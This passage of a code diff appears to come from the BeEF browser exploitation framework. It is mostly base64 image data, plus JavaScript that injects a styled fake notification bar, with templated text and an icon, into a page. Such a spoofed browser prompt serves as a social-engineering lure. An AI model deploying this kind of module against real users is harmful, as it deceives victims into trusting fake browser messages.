2Lbcc2sG7GtsL42K+xLfxtUgI7YHqKlqHK8HbCCXgjHT1cAdMlDetv4FnQ2lLasaOl6vmB0CMmwT/IPszSueHQqv6i/qluqF+oF9TfO2qEGTumJH0qfSv9KH0nfS/9TIp0Wboi/SRdlb6RLgU5u++9nyXYe69fYRPdil1o1WufNSdTTsp75BfllPy8/LI8G7AUuV8ek6fkvfDsCfbNDP0dvRh0CrNqTbV7LfEEGDQPJQadBtfGVMWEq3QWWdufk6ZSNsjG2PQjp3ZcnOWWing6noonSInvi0/Ex+IzAreevPhe+CawpgP1/pMTMDo64G0sTCXIM+KdOnFWRfQKdJvQzV1+Bt8OokmrdtY2yhVX2a+qrykJfMq4Ml3VR4cVzTQVz+UoNne4vcKLoyS+gyKO6EHe+75Fdt0Mbe5bRIf/wjvrVmhbqBN97RD1vxrahvBOfOYzoosH9bq94uejSOQGkVM6sN/7HelL4t10t9F4gPdVzydEOx83Gv+uNxo7XyL/FtFl8z9ZAHF4bBsrEwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAW5pVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IlhNUCBDb3JlIDQuNC4wIj4KICAgPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4KICAgICAgPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIKICAgICAgICAgICAgeG1sbnM6ZGM9Imh0dHA6Ly9wdXJsLm9yZy9kYy9lbGVtZW50cy8xLjEvIj4KICAgICAgICAgPGRjOnN1YmplY3Q+CiAgICAgICAgICAgIDxyZGY6QmFnLz4KICAgICAgICAgPC9kYzpzdWJqZWN0PgogICAgICA8L3JkZjpEZXNjcmlwdGlvbj4KICAgPC9yZGY6UkRGPgo8L3g6eG1wbWV0YT4K5T8NQQAAAE5JREFUGBmFTsENwEAIgg7T/efpMlRMMLafM1EBMUoAqoT0uE2Qd2NWbYOZJHOQHI0lfgQbEl64TLKZwdbasAd/3IZ9M4ZoxyfnxP5j4xfHNiMDVDlNEAAAAABJRU5ErkJggg==);'})
+        var elp = beef.dom.createElement('div',{'id':pid,'style':'margin: 2px 50px 0 4px; height: 25px; line-height: 25px; font-family: sans-serif; font-size: 12px; padding-bottom: 5px'});
+        $j('body').append(el);
+        var hid = '#'+id;
+        var hpid = '#'+pid;
+        $j(hid).append(elp);
+        $j(hpid).html("<%= @notification_text %>&nbsp;<img style='padding:0; margin:5px; position: absolute; top: 0;' src='data:image/png;base64,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